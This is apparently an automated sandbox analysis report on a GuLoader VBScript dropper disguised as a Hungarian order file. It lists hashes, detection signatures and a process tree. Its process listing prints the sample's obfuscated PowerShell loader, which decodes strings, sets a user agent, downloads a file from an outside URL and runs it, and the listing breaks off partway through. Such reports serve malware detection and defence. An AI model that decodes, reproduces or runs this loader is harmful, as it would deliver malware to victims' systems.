Edit tour
Windows
Analysis Report
Rendeles nr13252436324563635635464574544545445474.vbs
Overview
General Information
| Sample name: | Rendeles nr13252436324563635635464574544545445474.vbs |
| Analysis ID: | 1658270 |
| MD5: | 8b889d5bd26d96b38dae1a58aeb296fa |
| SHA1: | fbafcc56615b6f5650c9e29278a185ccd94773fb |
| SHA256: | 58418d0ab74530cc13a36b14a6288916250cdffb664e8cc57293119746993d21 |
| Tags: | HUNvbsuser-smica83 |
| Infos: |   |
 | |
Detection
GuLoader
| Score: | 92 |
| Range: | 0 - 100 |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7912 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Rende les nr1325 2436324563 6356354645 7454454544 5474.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 8044 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "Get-Servi ce;$Saddle cloths='fu nc';Get-Hi story;$Sad dlecloths+ ='t';Get-H istory;$Sa ddlecloths +='i';$Sam menholder= Get-Histor y;$Saddlec loths+='on :';$Sammen holder=Get -History;( ni -p $Sad dlecloths -n Unbraci ng -value { param($B lindgngern e);$elater ids=1;do { $universal midlet+=$B lindgngern e[$elateri ds];$elate rids+=2} u ntil(!$Bli ndgngerne[ $elaterids ])$univers almidlet}) ;(ni -p $S addlecloth s -n Sdvan en -value {param($Po larity);.( $Prelitera lness) ($P olarity)}) ;ConvertTo -Html;$Rec lassifying =Unbracing ' NDeSTS. W';$Recla ssifying+= Unbracing 'ceSbOCKL. i,E N T';$ Madannonce rs=Unbraci ng ' MBo z Ai l lAaI/ ';$Stonewe ed=Unbraci ng 'ST.lSs 1I2';$sub disjunctiv e=' [SN E T,. SMEiRT v i cSeMpM OOI nptNMR aSn a gMe R ]G:F: S e.cBUkR i TAy P.rmOF TAoKcNOuL =.$OSStGoS n E W ENEN D';$Madann oncers+=Un bracing '. 5 .V0T (OW giKn dRoKw EsR NUT T1 S0S..0U;T BWfi,n 6.4 F; .xB6 4F ;, wrLv :G 1H3U4 .R0K )k GAe.cEk No /I2 0S1 B0 0D1P0 1 U .F iBr e f oUx /I1 U3H4B.H0'; $brnesange s=Unbracin g 'Lu S ES RU- aBG ER n T';$Squi dgier=Unbr acing ' hR t tApmsA:M /B/.fMiVt b a b y h oXtOmCabm aC.,cFo m / u nScPo, m.mOeVnVsA uMr,aft e lAy,.udawG p';$Arbitr able=Unbra cing ',>'; $Prelitera lness=Unbr acing ' IC e x';$Anst etiske='Sc iaenids';$ Dannekvind ernes='\Li thochemist ry.Uva';Sd vanen (Unb racing 'S$ g l oCbTa SlF: NTe T aHFI.n d e =R$DeHN V F:saSP P d A tUAG+ $ NDSaGnSN E IkUvpI.NKD .E.rVn e s ');Sdvanen (Unbracin g 'D$.GPLG ONbMa lR:s IYN DKe k sTMOANrCKK eKR iMnHg. e.RFNPe = $ S Q,uEI, dGG IKE rL . SRP LGI, T (O$taSRO bAi TTR AS B,lqE )'); Sdvanen (U nbracing $ subdisjunc tive);$Squ idgier=$In deksmarker ingerne[0] ;$Fllesord ningerne=( Unbracing 'H$Sg LSO, BGa,L.:TF EPT ISs H, iPZsa,TUiN o N,=VnDe, wR- OSb JD E CLT RsHY sKtUe mI. $ R e CvL TaFSBs I F VYPiBn g') ;Sdvanen ( $Fllesordn ingerne);S dvanen (Un bracing 'N $PFAeTt iP s hRiAzKa tHi oBns.C H eSa.d,e rIs [ $fbI r n eUsNaO ncg e s ] =S$YM a.d. aTn n o nG c,e.rRs'); $Asfalts=U nbracing ' DFo.w n.l AoPa d.FPi Nl e';$Mus keg=Unbrac ing ' $ FG e t,i s.hG iczDa t iP o nH.E$ AO s,f.aHl,tL sK.PISn vP oSkSeA(.$, SFq uUiKd, gRi e rA,D $ T.eSaOb o xDe se)' ;$Teaboxes =$Nethinde ;Sdvanen ( Unbracing 'T$ GRL OT b a LG: d i sVKFOAs k,ADS.T ED R nNENsL7c 5 =f(ATZE SStA- pBaI tFhK A$ t eMa.BaO x e ss)');wh ile (!$Dis koskastern es75) {Sdv anen (Unbr acing ' $ g l oHbRa. l : F oFr l a gAs,bE o,g hSa,n dFe l sT= $ HFyPgIiU ePn iRsSt' ) ;Sdvanen $Muskeg;S dvanen (Un bracing 'T [ tPHDr ES a.dIi NSG .IT.h ROet A D ] :S:V sSL,E eEP (L4P0S0M0 )');Sdvane n (Unbraci ng '.$ Gbl oSBHAOlF: RdUiIsSKDo